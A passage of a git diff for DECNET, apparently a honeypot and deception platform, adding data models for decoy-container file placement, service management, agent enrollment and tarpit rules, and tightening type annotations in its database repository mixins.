``touch -d`` so realistic-aged + files don't all stamp at wall-clock-now. 
+ """ + decky_name: str = PydanticField(..., min_length=1) + topology_id: Optional[str] = None + path: str = PydanticField(..., min_length=1) + content_b64: str + mode: int = 0o644 + mtime_offset: int = 0 + + @field_validator("path") + @classmethod + def _abs_no_traversal(cls, v: str) -> str: + if not v.startswith("/"): + raise ValueError("path must be absolute (start with '/')") + # Defense in depth: even though we run as root inside the + # container, ``..`` segments make the on-disk location depend + # on the cwd at exec-time and surprise both operators and the + # auditor reading the placement_path field later. + for seg in v.split("/"): + if seg == "..": + raise ValueError("path must not contain '..' segments") + return v + + +class DeckyServiceAddRequest(BaseModel): + """Add a single service to an already-deployed decky. + + The service must be registered (see :mod:`decnet.services.registry`) + and must NOT be ``fleet_singleton`` — those run once fleet-wide, + not per-decky. Validation happens server-side in the engine layer + and surfaces as 422. + + ``config`` carries optional initial per-service config (same shape as + DeckyServiceConfigRequest.config) so the freshly-added container + comes up with the operator's env from the start, no follow-up Apply + needed. Empty dict = build with defaults. + """ + name: str = PydanticField(..., min_length=1) + config: dict[str, Any] = PydanticField(default_factory=dict) + + +class DeckyServicesResponse(BaseModel): + """Post-mutation services list, returned by the live add/remove API. + + Lets the dashboard reflect the new shape without a follow-up GET. + """ + decky_name: str + topology_id: Optional[str] = None + services: list[str] + + +class ServiceConfigFieldDTO(BaseModel): + """Serialized form of ``decnet.services.base.ServiceConfigField``. + + The Inspector form (Fleet + MazeNET) renders inputs from this metadata. 
+ """ + key: str + label: str + type: str + default: Optional[Any] = None + secret: bool = False + help: Optional[str] = None + enum: Optional[list[str]] = None + placeholder: Optional[str] = None + + +class ServiceSchemaResponse(BaseModel): + """Per-service config schema returned by GET /services/{name}/schema.""" + name: str + ports: list[int] + fleet_singleton: bool = False + fields: list[ServiceConfigFieldDTO] = PydanticField(default_factory=list) + + +class DeckyServiceConfigRequest(BaseModel): + """Body for PUT/POST per-service config endpoints. + + The dict is validated against the service's ``config_schema`` + server-side: unknown keys are silently dropped, declared keys are + coerced to their declared type, and out-of-range values raise 400. + """ + config: dict[str, Any] = PydanticField(default_factory=dict) + + +class DeckyServiceConfigResponse(BaseModel): + """Post-validation config + apply state for the form to re-sync from.""" + decky_name: str + service_name: str + topology_id: Optional[str] = None + config: dict[str, Any] = PydanticField(default_factory=dict) + recreated: bool = False + + +class DeckyFileDeleteRequest(BaseModel): + """Best-effort ``rm -f`` of an absolute path inside a decky container.""" + decky_name: str = PydanticField(..., min_length=1) + topology_id: Optional[str] = None + path: str = PydanticField(..., min_length=1) + + @field_validator("path") + @classmethod + def _abs_no_traversal(cls, v: str) -> str: + if not v.startswith("/"): + raise ValueError("path must be absolute (start with '/')") + for seg in v.split("/"): + if seg == "..": + raise ValueError("path must not contain '..' 
segments") + return v diff --git a/decnet/web/db/models/swarm.py b/decnet/web/db/models/swarm.py index 68785952..1ab0dfa3 100644 --- a/decnet/web/db/models/swarm.py +++ b/decnet/web/db/models/swarm.py @@ -198,3 +198,34 @@ class SwarmHostHealth(BaseModel): class SwarmCheckResponse(BaseModel): results: list[SwarmHostHealth] + + +class EnrollBundleRequest(BaseModel): + master_host: str = PydanticField(..., min_length=1, max_length=253, + description="IP/host the agent will reach back to") + agent_name: str = PydanticField(..., pattern=r"^[a-z0-9][a-z0-9-]{0,62}$", + description="Worker name (DNS-label safe)") + with_updater: bool = PydanticField( + default=True, + description="Include updater cert bundle and auto-start decnet updater on the agent", + ) + use_ipvlan: bool = PydanticField( + default=False, + description=( + "Run deckies on this agent over IPvlan L2 instead of MACVLAN. " + "Required when the agent is a VirtualBox/VMware guest bridged over Wi-Fi — " + "Wi-Fi APs bind one MAC per station, so MACVLAN's extra container MACs " + "rotate the VM's DHCP lease. Safe no-op on wired/bare-metal hosts." + ), + ) + services_ini: Optional[str] = PydanticField( + default=None, + description="Optional INI text shipped to the agent as /etc/decnet/services.ini", + ) + + +class EnrollBundleResponse(BaseModel): + token: str + command: str + expires_at: datetime + host_uuid: str diff --git a/decnet/web/db/models/tarpit.py b/decnet/web/db/models/tarpit.py new file mode 100644 index 00000000..e43c214b --- /dev/null +++ b/decnet/web/db/models/tarpit.py @@ -0,0 +1,44 @@ +"""Tarpit rule table + HTTP request/response shapes.""" +from datetime import datetime, timezone +from typing import Any + +from pydantic import BaseModel, Field as PydanticField +from sqlmodel import Field, SQLModel + + +class TarpitRule(SQLModel, table=True): + """One active tarpit rule — one per decky at a time. + + ``ports`` is JSON-encoded (e.g. ``"[22, 80]"``). 
One row per decky; + ``set_tarpit_rule`` upserts on ``decky_name`` so re-enabling with + different parameters replaces the old rule. + """ + __tablename__ = "tarpit_rules" + + id: str = Field(primary_key=True) + decky_name: str = Field(index=True, unique=True) + ports: str # JSON list[int] + delay_ms: int + created_at: datetime = Field( + default_factory=lambda: datetime.now(timezone.utc) + ) + created_by: str # operator UUID from JWT + + +class TarpitEnableRequest(BaseModel): + ports: list[int] = PydanticField(..., min_length=1) + delay_ms: int = PydanticField(..., ge=100, le=300_000) + + +class TarpitRuleResponse(BaseModel): + id: str + decky_name: str + ports: list[int] + delay_ms: int + created_at: datetime + created_by: str + + +class TarpitStatusResponse(BaseModel): + rule: TarpitRuleResponse + active_connections: list[dict[str, Any]] diff --git a/decnet/web/db/models/topology.py b/decnet/web/db/models/topology.py index 8fae8f69..59825f74 100644 --- a/decnet/web/db/models/topology.py +++ b/decnet/web/db/models/topology.py @@ -1,14 +1,25 @@ """MazeNET topology tables + the REST DTOs that wrap them.""" +import json from datetime import datetime, timezone from typing import Annotated, Any, Literal, Optional from uuid import uuid4 from pydantic import BaseModel, BeforeValidator, ConfigDict, Field as PydanticField -from sqlalchemy import Column, Index, Text, UniqueConstraint +from sqlalchemy import Column, Index, String, Text, UniqueConstraint from sqlmodel import Field, SQLModel from ._base import _BIG_TEXT +_MUTATION_OPS = Literal[ + "add_lan", + "remove_lan", + "add_decky", + "attach_decky", + "detach_decky", + "remove_decky", + "update_decky", + "update_lan", +] # --- MazeNET tables --- # Nested deception topologies: an arbitrary-depth DAG of LANs connected by @@ -19,7 +30,9 @@ class Topology(SQLModel, table=True): __tablename__ = "topologies" id: str = Field(default_factory=lambda: str(uuid4()), primary_key=True) name: str = Field(index=True, unique=True) - 
mode: str = Field(default="unihost") # unihost|agent + mode: Literal["unihost", "agent"] = Field( + default="unihost", sa_column=Column("mode", String, nullable=False, default="unihost") + ) # When ``mode == "agent"``, pins this topology to a specific enrolled # worker. ``None`` for unihost topologies (master-local deploy). target_host_uuid: Optional[str] = Field( @@ -29,9 +42,12 @@ class Topology(SQLModel, table=True): config_snapshot: str = Field( sa_column=Column("config_snapshot", _BIG_TEXT, nullable=False, default="{}") ) - status: str = Field( - default="pending", index=True - ) # pending|deploying|active|degraded|failed|tearing_down|torn_down + status: Literal[ + "pending", "deploying", "active", "degraded", "failed", "tearing_down", "torn_down" + ] = Field( + default="pending", + sa_column=Column("status", String, nullable=False, default="pending", index=True), + ) status_changed_at: datetime = Field( default_factory=lambda: datetime.now(timezone.utc) ) @@ -101,10 +117,12 @@ class TopologyDecky(SQLModel, table=True): default=None, sa_column=Column("decky_config", _BIG_TEXT, nullable=True) ) ip: Optional[str] = Field(default=None) - # Same vocabulary as DeckyShard.state to keep dashboard rendering uniform. 
- state: str = Field( - default="pending", index=True - ) # pending|running|failed|torn_down|degraded|tearing_down|teardown_failed + state: Literal[ + "pending", "running", "failed", "torn_down", "degraded", "tearing_down", "teardown_failed" + ] = Field( + default="pending", + sa_column=Column("state", String, nullable=False, default="pending", index=True), + ) last_error: Optional[str] = Field( default=None, sa_column=Column("last_error", Text, nullable=True) ) @@ -168,15 +186,14 @@ class TopologyMutation(SQLModel, table=True): ) id: str = Field(default_factory=lambda: str(uuid4()), primary_key=True) topology_id: str = Field(foreign_key="topologies.id", index=True) - # add_lan|remove_lan|add_decky|attach_decky|detach_decky| - # remove_decky|update_decky|update_lan - op: str = Field(index=True) - # JSON-serialised op payload (keys depend on ``op``). + op: _MUTATION_OPS = Field(sa_column=Column("op", String, nullable=False, index=True)) payload: str = Field( sa_column=Column("payload", _BIG_TEXT, nullable=False, default="{}") ) - # pending|applying|applied|failed - state: str = Field(default="pending", index=True) + state: Literal["pending", "applying", "applied", "failed"] = Field( + default="pending", + sa_column=Column("state", String, nullable=False, default="pending", index=True), + ) requested_at: datetime = Field( default_factory=lambda: datetime.now(timezone.utc), index=True ) @@ -220,6 +237,8 @@ class TopologySummary(BaseModel): needs_resync: bool = False created_at: datetime status_changed_at: Optional[datetime] = None + email_personas: str = "[]" + language_default: str = "en" class TopologyListResponse(BaseModel): @@ -332,18 +351,6 @@ class EdgeCreateRequest(BaseModel): expected_version: Optional[int] = None -_MUTATION_OPS = Literal[ - "add_lan", - "remove_lan", - "add_decky", - "attach_decky", - "detach_decky", - "remove_decky", - "update_decky", - "update_lan", -] - - class MutationEnqueueRequest(BaseModel): op: _MUTATION_OPS payload: dict[str, Any] = 
PydanticField(default_factory=dict) @@ -353,8 +360,7 @@ class MutationEnqueueRequest(BaseModel): def _decode_json_payload(v: Any) -> Any: """Accept either a dict or a JSON-encoded string for mutation payloads.""" if isinstance(v, str): - import json as _json - return _json.loads(v) if v else {} + return json.loads(v) if v else {} return v @@ -365,7 +371,7 @@ class MutationRow(BaseModel): model_config = ConfigDict(extra="ignore") id: str topology_id: str - op: str + op: _MUTATION_OPS payload: _MutationPayload = PydanticField(default_factory=dict) state: str requested_at: datetime @@ -404,6 +410,12 @@ class NotEditableResponse(BaseModel): class ServiceCatalogResponse(BaseModel): services: list[str] + # Subset of ``services`` that run once fleet-wide (LLMNR, etc.) and + # therefore can't be added to a single decky. Per-decky add UIs + # filter these out so the operator never picks an option that the + # server would reject as 422. Empty when the registry has no + # singletons. + fleet_singletons: list[str] = PydanticField(default_factory=list) class ArchetypeEntry(BaseModel): diff --git a/decnet/web/db/repository.py b/decnet/web/db/repository.py index 140294b4..188cd5b1 100644 --- a/decnet/web/db/repository.py +++ b/decnet/web/db/repository.py @@ -1,6 +1,8 @@ from abc import ABC, abstractmethod from typing import Any, Optional +from decnet.web.db.models.topology import DeckyRow, EdgeRow, LANRow, TopologySummary + class BaseRepository(ABC): """Abstract base class for DECNET web dashboard data storage.""" @@ -724,7 +726,7 @@ class BaseRepository(ABC): async def create_topology(self, data: dict[str, Any]) -> str: raise NotImplementedError - async def get_topology(self, topology_id: str) -> Optional[dict[str, Any]]: + async def get_topology(self, topology_id: str) -> Optional[TopologySummary]: raise NotImplementedError async def list_topologies( @@ -732,7 +734,7 @@ class BaseRepository(ABC): status: Optional[str] = None, limit: Optional[int] = None, offset: Optional[int] 
= None, - ) -> list[dict[str, Any]]: + ) -> list[TopologySummary]: raise NotImplementedError async def count_topologies(self, status: Optional[str] = None) -> int: @@ -757,7 +759,7 @@ class BaseRepository(ABC): ) -> bool: raise NotImplementedError - async def list_topologies_needing_resync(self) -> list[dict[str, Any]]: + async def list_topologies_needing_resync(self) -> list[TopologySummary]: raise NotImplementedError async def add_lan( @@ -780,7 +782,7 @@ class BaseRepository(ABC): async def list_lans_for_topology( self, topology_id: str - ) -> list[dict[str, Any]]: + ) -> list[LANRow]: raise NotImplementedError async def add_topology_decky( @@ -803,7 +805,7 @@ class BaseRepository(ABC): async def list_topology_deckies( self, topology_id: str - ) -> list[dict[str, Any]]: + ) -> list[DeckyRow]: raise NotImplementedError async def add_topology_edge( @@ -816,7 +818,7 @@ class BaseRepository(ABC): async def list_topology_edges( self, topology_id: str - ) -> list[dict[str, Any]]: + ) -> list[EdgeRow]: raise NotImplementedError async def list_topology_status_events( @@ -827,17 +829,29 @@ class BaseRepository(ABC): # -------------------- pre-deploy (pending-only) mutations -------------------- async def delete_lan( - self, lan_id: str, *, expected_version: Optional[int] = None + self, + lan_id: str, + *, + expected_version: Optional[int] = None, + enforce_pending: bool = True, ) -> None: raise NotImplementedError async def delete_topology_decky( - self, decky_uuid: str, *, expected_version: Optional[int] = None + self, + decky_uuid: str, + *, + expected_version: Optional[int] = None, + enforce_pending: bool = True, ) -> None: raise NotImplementedError async def delete_topology_edge( - self, edge_id: str, *, expected_version: Optional[int] = None + self, + edge_id: str, + *, + expected_version: Optional[int] = None, + enforce_pending: bool = True, ) -> None: raise NotImplementedError @@ -976,6 +990,7 @@ class BaseRepository(ABC): decky_name: Optional[str] = None, state: 
Optional[str] = None, kind: Optional[str] = None, + topology_id: Optional[str] = None, ) -> list[dict[str, Any]]: raise NotImplementedError diff --git a/decnet/web/db/sqlmodel_repo/__init__.py b/decnet/web/db/sqlmodel_repo/__init__.py index 4bc87db6..df49a194 100644 --- a/decnet/web/db/sqlmodel_repo/__init__.py +++ b/decnet/web/db/sqlmodel_repo/__init__.py @@ -48,6 +48,7 @@ from decnet.web.db.sqlmodel_repo.orchestrator import OrchestratorMixin from decnet.web.db.sqlmodel_repo.realism import RealismMixin from decnet.web.db.sqlmodel_repo.swarm import SwarmMixin from decnet.web.db.sqlmodel_repo.topology import TopologyMixin +from decnet.web.db.sqlmodel_repo.tarpit import TarpitMixin from decnet.web.db.sqlmodel_repo.webhooks import WebhooksMixin @@ -66,6 +67,7 @@ class SQLModelRepository( OrchestratorMixin, RealismMixin, SwarmMixin, + TarpitMixin, TopologyMixin, WebhooksMixin, BaseRepository, diff --git a/decnet/web/db/sqlmodel_repo/_helpers.py b/decnet/web/db/sqlmodel_repo/_helpers.py index 8791dbd0..29b42727 100644 --- a/decnet/web/db/sqlmodel_repo/_helpers.py +++ b/decnet/web/db/sqlmodel_repo/_helpers.py @@ -12,14 +12,60 @@ from __future__ import annotations import asyncio import json +from abc import abstractmethod from contextlib import asynccontextmanager -from typing import Any +from typing import Any, Optional, TypeVar import orjson from sqlalchemy.ext.asyncio import AsyncSession, async_sessionmaker from decnet.logging import get_logger +T = TypeVar("T") + + +def _require(val: T | None, msg: str) -> T: + """Narrow ``X | None`` to ``X``, raising ``ValueError`` if None.""" + if val is None: + raise ValueError(msg) + return val + + +class _MixinBase: + """Typing base for all repo mixins. + + Declares the contract that ``SQLModelRepository`` satisfies at runtime + via MRO composition. Without this, mypy checks each mixin in isolation + and cannot see ``_session`` or cross-mixin helpers. 
+ """ + + @abstractmethod + def _session(self): + """Return a cancellation-safe async session context manager.""" + raise NotImplementedError + + @staticmethod + def _deserialize_attacker(d: dict[str, Any]) -> dict[str, Any]: + """Stub — concrete impl on AttackersCoreMixin via MRO.""" + return d + + async def _assert_pending(self, session: AsyncSession, topology_id: str) -> None: + """Stub — concrete impl on TopologyCoreMixin via MRO.""" + raise NotImplementedError + + async def _check_and_bump_version( + self, + session: AsyncSession, + topology_id: str, + expected_version: Optional[int], + ) -> None: + """Stub — concrete impl on TopologyCoreMixin via MRO.""" + raise NotImplementedError + + async def list_running_topology_deckies(self) -> list[dict[str, Any]]: + """Stub — concrete impl on TopologyDeckiesMixin via MRO.""" + raise NotImplementedError + _log = get_logger("db.pool") # Hold strong refs to in-flight cleanup tasks so they aren't GC'd mid-run. @@ -66,7 +112,7 @@ def _detach_close(session: AsyncSession) -> None: task = loop.create_task(_cleanup()) _cleanup_tasks.add(task) # Consume any exception to silence "Task exception was never retrieved". 
- task.add_done_callback(lambda t: (_cleanup_tasks.discard(t), t.exception())) + task.add_done_callback(lambda t: (_cleanup_tasks.discard(t), t.exception())) # type: ignore[func-returns-value] @asynccontextmanager diff --git a/decnet/web/db/sqlmodel_repo/attacker_intel.py b/decnet/web/db/sqlmodel_repo/attacker_intel.py index 4b4ae9ad..a0cc6696 100644 --- a/decnet/web/db/sqlmodel_repo/attacker_intel.py +++ b/decnet/web/db/sqlmodel_repo/attacker_intel.py @@ -13,11 +13,14 @@ from datetime import datetime, timezone from typing import Any, Optional from sqlalchemy import desc, or_, select +from sqlmodel import col from decnet.web.db.models import Attacker, AttackerIntel -class AttackerIntelMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class AttackerIntelMixin(_MixinBase): """Mixin: methods composed onto ``SQLModelRepository``. Expects ``self._session()`` from the base. @@ -82,13 +85,13 @@ class AttackerIntelMixin: now = datetime.now(timezone.utc) async with self._session() as session: stmt = ( - select(Attacker.uuid, Attacker.ip) + select(col(Attacker.uuid), col(Attacker.ip)) .outerjoin( AttackerIntel, AttackerIntel.attacker_uuid == Attacker.uuid, ) .where( or_( - AttackerIntel.uuid.is_(None), + col(AttackerIntel.uuid).is_(None), AttackerIntel.expires_at < now, ) ) diff --git a/decnet/web/db/sqlmodel_repo/attackers/_core.py b/decnet/web/db/sqlmodel_repo/attackers/_core.py index a5240032..22e1739d 100644 --- a/decnet/web/db/sqlmodel_repo/attackers/_core.py +++ b/decnet/web/db/sqlmodel_repo/attackers/_core.py @@ -11,12 +11,15 @@ import json import uuid as _uuid from typing import Any, List, Optional -from sqlalchemy import desc, func, select +from sqlalchemy import desc, func, outerjoin, select +from sqlmodel import col -from decnet.web.db.models import Attacker +from decnet.web.db.models import Attacker, AttackerIntel -class AttackersCoreMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class AttackersCoreMixin(_MixinBase): 
@staticmethod def _deserialize_attacker(d: dict[str, Any]) -> dict[str, Any]: for key in ("services", "deckies", "fingerprints", "commands"): @@ -63,16 +66,16 @@ class AttackersCoreMixin: sort_by: str = "recent", service: Optional[str] = None, ) -> List[dict[str, Any]]: - order = { + order: Any = { "active": desc(Attacker.event_count), "traversals": desc(Attacker.is_traversal), }.get(sort_by, desc(Attacker.last_seen)) statement = select(Attacker).order_by(order).offset(offset).limit(limit) if search: - statement = statement.where(Attacker.ip.like(f"%{search}%")) + statement = statement.where(col(Attacker.ip).like(f"%{search}%")) if service: - statement = statement.where(Attacker.services.like(f'%"{service}"%')) + statement = statement.where(col(Attacker.services).like(f'%"{service}"%')) async with self._session() as session: result = await session.execute(statement) @@ -81,14 +84,49 @@ class AttackersCoreMixin: for a in result.scalars().all() ] + async def get_all_attackers_for_export(self) -> list[dict[str, Any]]: + """Return every attacker row left-joined with its intel row. + + Used exclusively by the export endpoint — no pagination, ordered by + last_seen desc so the file reads newest-first. 
+ """ + stmt = ( + select(Attacker, AttackerIntel) + .select_from( + outerjoin(Attacker, AttackerIntel, Attacker.uuid == AttackerIntel.attacker_uuid) + ) + .order_by(desc(Attacker.last_seen)) + ) + async with self._session() as session: + rows = (await session.execute(stmt)).all() + + _intel_raw_keys = ("greynoise_raw", "abuseipdb_raw", "feodo_raw", "threatfox_raw") + result = [] + for attacker, intel in rows: + d = self._deserialize_attacker(attacker.model_dump(mode="json")) + if intel is not None: + intel_d = intel.model_dump(mode="json") + for key in _intel_raw_keys: + raw = intel_d.get(key) + if isinstance(raw, str): + try: + intel_d[key] = json.loads(raw) + except (json.JSONDecodeError, TypeError): + pass + d["threat_intel"] = intel_d + else: + d["threat_intel"] = None + result.append(d) + return result + async def get_total_attackers( self, search: Optional[str] = None, service: Optional[str] = None ) -> int: statement = select(func.count()).select_from(Attacker) if search: - statement = statement.where(Attacker.ip.like(f"%{search}%")) + statement = statement.where(col(Attacker.ip).like(f"%{search}%")) if service: - statement = statement.where(Attacker.services.like(f'%"{service}"%')) + statement = statement.where(col(Attacker.services).like(f'%"{service}"%')) async with self._session() as session: result = await session.execute(statement) diff --git a/decnet/web/db/sqlmodel_repo/attackers/activity.py b/decnet/web/db/sqlmodel_repo/attackers/activity.py index 60848fdb..328458ac 100644 --- a/decnet/web/db/sqlmodel_repo/attackers/activity.py +++ b/decnet/web/db/sqlmodel_repo/attackers/activity.py @@ -10,11 +10,14 @@ import json from typing import Any, Optional from sqlalchemy import desc, func, select +from sqlmodel import col from decnet.web.db.models import Attacker, Bounty, Log -class AttackerActivityMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class AttackerActivityMixin(_MixinBase): async def get_attacker_commands( self, uuid: str, 
@@ -24,7 +27,7 @@ class AttackerActivityMixin: ) -> dict[str, Any]: async with self._session() as session: result = await session.execute( - select(Attacker.commands).where(Attacker.uuid == uuid) + select(col(Attacker.commands)).where(Attacker.uuid == uuid) ) raw = result.scalar_one_or_none() if raw is None: @@ -52,13 +55,13 @@ class AttackerActivityMixin: """ async with self._session() as session: ip_res = await session.execute( - select(Attacker.ip).where(Attacker.uuid == attacker_uuid) + select(col(Attacker.ip)).where(Attacker.uuid == attacker_uuid) ) ip = ip_res.scalar_one_or_none() if not ip: return [] rows = await session.execute( - select(Log.service, Log.event_type) + select(col(Log.service), col(Log.event_type)) .where(Log.attacker_ip == ip) .distinct() ) @@ -75,7 +78,7 @@ class AttackerActivityMixin: rotation detection.""" async with self._session() as session: ip_res = await session.execute( - select(Attacker.ip).where(Attacker.uuid == attacker_uuid) + select(col(Attacker.ip)).where(Attacker.uuid == attacker_uuid) ) ip = ip_res.scalar_one_or_none() if not ip: @@ -104,7 +107,7 @@ class AttackerActivityMixin: """Cheap COUNT(*) for XFF-rotation detection.""" async with self._session() as session: ip_res = await session.execute( - select(Attacker.ip).where(Attacker.uuid == attacker_uuid) + select(col(Attacker.ip)).where(Attacker.uuid == attacker_uuid) ) ip = ip_res.scalar_one_or_none() if not ip: @@ -126,7 +129,7 @@ class AttackerActivityMixin: """ async with self._session() as session: ip_res = await session.execute( - select(Attacker.ip).where(Attacker.uuid == uuid) + select(col(Attacker.ip)).where(Attacker.uuid == uuid) ) ip = ip_res.scalar_one_or_none() if not ip: @@ -150,7 +153,7 @@ class AttackerActivityMixin: """ async with self._session() as session: ip_res = await session.execute( - select(Attacker.ip).where(Attacker.uuid == uuid) + select(col(Attacker.ip)).where(Attacker.uuid == uuid) ) ip = ip_res.scalar_one_or_none() if not ip: @@ -176,7 +179,7 
@@ class AttackerActivityMixin: rows = await session.execute( select(Log) .where(Log.event_type == "session_recorded") - .where(Log.fields.contains(needle)) + .where(col(Log.fields).contains(needle)) .limit(1) ) row = rows.scalars().first() @@ -192,7 +195,7 @@ class AttackerActivityMixin: """ async with self._session() as session: ip_res = await session.execute( - select(Attacker.ip).where(Attacker.uuid == uuid) + select(col(Attacker.ip)).where(Attacker.uuid == uuid) ) ip = ip_res.scalar_one_or_none() if not ip: diff --git a/decnet/web/db/sqlmodel_repo/attackers/behavior.py b/decnet/web/db/sqlmodel_repo/attackers/behavior.py index c413557b..c8f8870b 100644 --- a/decnet/web/db/sqlmodel_repo/attackers/behavior.py +++ b/decnet/web/db/sqlmodel_repo/attackers/behavior.py @@ -7,11 +7,14 @@ from datetime import datetime, timezone from typing import Any, Optional from sqlalchemy import select +from sqlmodel import col from decnet.web.db.models import Attacker, AttackerBehavior -class AttackerBehaviorMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class AttackerBehaviorMixin(_MixinBase): async def upsert_attacker_behavior( self, attacker_uuid: str, @@ -56,9 +59,9 @@ class AttackerBehaviorMixin: return {} async with self._session() as session: result = await session.execute( - select(Attacker.ip, AttackerBehavior) + select(col(Attacker.ip), AttackerBehavior) .join(AttackerBehavior, Attacker.uuid == AttackerBehavior.attacker_uuid) - .where(Attacker.ip.in_(ips)) + .where(col(Attacker.ip).in_(ips)) ) out: dict[str, dict[str, Any]] = {} for ip, row in result.all(): diff --git a/decnet/web/db/sqlmodel_repo/attackers/sessions.py b/decnet/web/db/sqlmodel_repo/attackers/sessions.py index 2374bea5..07787ce6 100644 --- a/decnet/web/db/sqlmodel_repo/attackers/sessions.py +++ b/decnet/web/db/sqlmodel_repo/attackers/sessions.py @@ -9,7 +9,9 @@ from sqlalchemy import select from decnet.web.db.models import SessionProfile -class SessionProfilesMixin: +from 
decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class SessionProfilesMixin(_MixinBase): async def upsert_session_profile( self, sid: str, diff --git a/decnet/web/db/sqlmodel_repo/attackers/smtp.py b/decnet/web/db/sqlmodel_repo/attackers/smtp.py index a6e5a1ec..45b75c97 100644 --- a/decnet/web/db/sqlmodel_repo/attackers/smtp.py +++ b/decnet/web/db/sqlmodel_repo/attackers/smtp.py @@ -10,7 +10,9 @@ from sqlalchemy import desc, func, select from decnet.web.db.models import SmtpTarget -class SmtpTargetsMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class SmtpTargetsMixin(_MixinBase): async def increment_smtp_target(self, attacker_uuid: str, domain: str) -> None: """Upsert an (attacker_uuid, domain) pair and bump count + last_seen. diff --git a/decnet/web/db/sqlmodel_repo/auth.py b/decnet/web/db/sqlmodel_repo/auth.py index e322b5ea..63967c9b 100644 --- a/decnet/web/db/sqlmodel_repo/auth.py +++ b/decnet/web/db/sqlmodel_repo/auth.py @@ -8,7 +8,9 @@ from sqlalchemy import select, update from decnet.web.db.models import User -class AuthMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class AuthMixin(_MixinBase): """Mixin: composed onto ``SQLModelRepository``. Expects ``self._session()``. 
``_ensure_admin_user`` stays in the package ``__init__`` so the diff --git a/decnet/web/db/sqlmodel_repo/bounties.py b/decnet/web/db/sqlmodel_repo/bounties.py index 00c3880d..94c7ac56 100644 --- a/decnet/web/db/sqlmodel_repo/bounties.py +++ b/decnet/web/db/sqlmodel_repo/bounties.py @@ -7,12 +7,15 @@ from typing import Any, List, Optional import orjson from sqlalchemy import asc, desc, func, or_, select, text +from sqlmodel import col from sqlmodel.sql.expression import SelectOfScalar from decnet.web.db.models import Bounty -class BountiesMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class BountiesMixin(_MixinBase): """Mixin: composed onto ``SQLModelRepository``.""" async def purge_logs_and_bounties(self) -> dict[str, int]: @@ -40,7 +43,7 @@ class BountiesMixin: async with self._session() as session: dup = await session.execute( - select(Bounty.id).where( + select(col(Bounty.id)).where( Bounty.bounty_type == data.get("bounty_type"), Bounty.attacker_ip == data.get("attacker_ip"), Bounty.payload == data.get("payload"), @@ -63,10 +66,10 @@ class BountiesMixin: lk = f"%{search}%" statement = statement.where( or_( - Bounty.decky.like(lk), - Bounty.service.like(lk), - Bounty.attacker_ip.like(lk), - Bounty.payload.like(lk), + col(Bounty.decky).like(lk), + col(Bounty.service).like(lk), + col(Bounty.attacker_ip).like(lk), + col(Bounty.payload).like(lk), ) ) return statement @@ -126,7 +129,7 @@ class BountiesMixin: async def get_bounties_for_ips(self, ips: set[str]) -> dict[str, List[dict[str, Any]]]: async with self._session() as session: result = await session.execute( - select(Bounty).where(Bounty.attacker_ip.in_(ips)).order_by(asc(Bounty.timestamp)) + select(Bounty).where(col(Bounty.attacker_ip).in_(ips)).order_by(asc(Bounty.timestamp)) ) grouped: dict[str, List[dict[str, Any]]] = defaultdict(list) for item in result.scalars().all(): @@ -137,3 +140,15 @@ class BountiesMixin: pass grouped[item.attacker_ip].append(d) return dict(grouped) + + async 
def count_probe_relays(self, attacker_ip: str, decky: str) -> int: + """Return how many probe_relay bounties exist for this (attacker_ip, decky) pair.""" + async with self._session() as session: + result = await session.execute( + select(func.count()).select_from(Bounty).where( + Bounty.attacker_ip == attacker_ip, + Bounty.decky == decky, + Bounty.bounty_type == "probe_relay", + ) + ) + return result.scalar() or 0 diff --git a/decnet/web/db/sqlmodel_repo/campaigns.py b/decnet/web/db/sqlmodel_repo/campaigns.py index 9c9b10ff..fe87bf2a 100644 --- a/decnet/web/db/sqlmodel_repo/campaigns.py +++ b/decnet/web/db/sqlmodel_repo/campaigns.py @@ -11,11 +11,14 @@ from datetime import datetime, timezone from typing import Any, Optional from sqlalchemy import desc, func, select, update +from sqlmodel import col from decnet.web.db.models import AttackerIdentity, Campaign -class CampaignsMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class CampaignsMixin(_MixinBase): """Mixin: composed onto ``SQLModelRepository``.""" async def get_campaign_by_uuid(self, uuid: str) -> Optional[dict[str, Any]]: @@ -41,7 +44,7 @@ class CampaignsMixin: ) -> list[dict[str, Any]]: statement = ( select(Campaign) - .where(Campaign.merged_into_uuid.is_(None)) + .where(col(Campaign.merged_into_uuid).is_(None)) .order_by(desc(Campaign.updated_at)) .offset(offset) .limit(limit) @@ -54,7 +57,7 @@ class CampaignsMixin: statement = ( select(func.count()) .select_from(Campaign) - .where(Campaign.merged_into_uuid.is_(None)) + .where(col(Campaign.merged_into_uuid).is_(None)) ) async with self._session() as session: result = await session.execute(statement) @@ -91,7 +94,7 @@ class CampaignsMixin: # graph reads. Narrow on purpose — future denormalised # projections (commands_by_phase from log mining, decky-set # aggregates) can land here without churning callers. 
- statement = select( + statement = select( # type: ignore[call-overload, misc] AttackerIdentity.uuid, AttackerIdentity.campaign_id, AttackerIdentity.merged_into_uuid, diff --git a/decnet/web/db/sqlmodel_repo/canary.py b/decnet/web/db/sqlmodel_repo/canary.py index c42d4d4f..047008dc 100644 --- a/decnet/web/db/sqlmodel_repo/canary.py +++ b/decnet/web/db/sqlmodel_repo/canary.py @@ -10,7 +10,9 @@ from sqlalchemy import desc, func, select, update from decnet.web.db.models import CanaryBlob, CanaryToken, CanaryTrigger -class CanaryMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class CanaryMixin(_MixinBase): """Mixin: composed onto ``SQLModelRepository``.""" async def upsert_canary_blob(self, data: dict[str, Any]) -> dict[str, Any]: @@ -110,7 +112,8 @@ class CanaryMixin: async with self._session() as session: result = await session.execute( select(CanaryToken).where( - CanaryToken.callback_token == callback_token + CanaryToken.callback_token == callback_token, + CanaryToken.state == "planted", ) ) row = result.scalar_one_or_none() @@ -122,6 +125,7 @@ class CanaryMixin: decky_name: Optional[str] = None, state: Optional[str] = None, kind: Optional[str] = None, + topology_id: Optional[str] = None, ) -> list[dict[str, Any]]: async with self._session() as session: stmt = select(CanaryToken) @@ -131,6 +135,8 @@ class CanaryMixin: stmt = stmt.where(CanaryToken.state == state) if 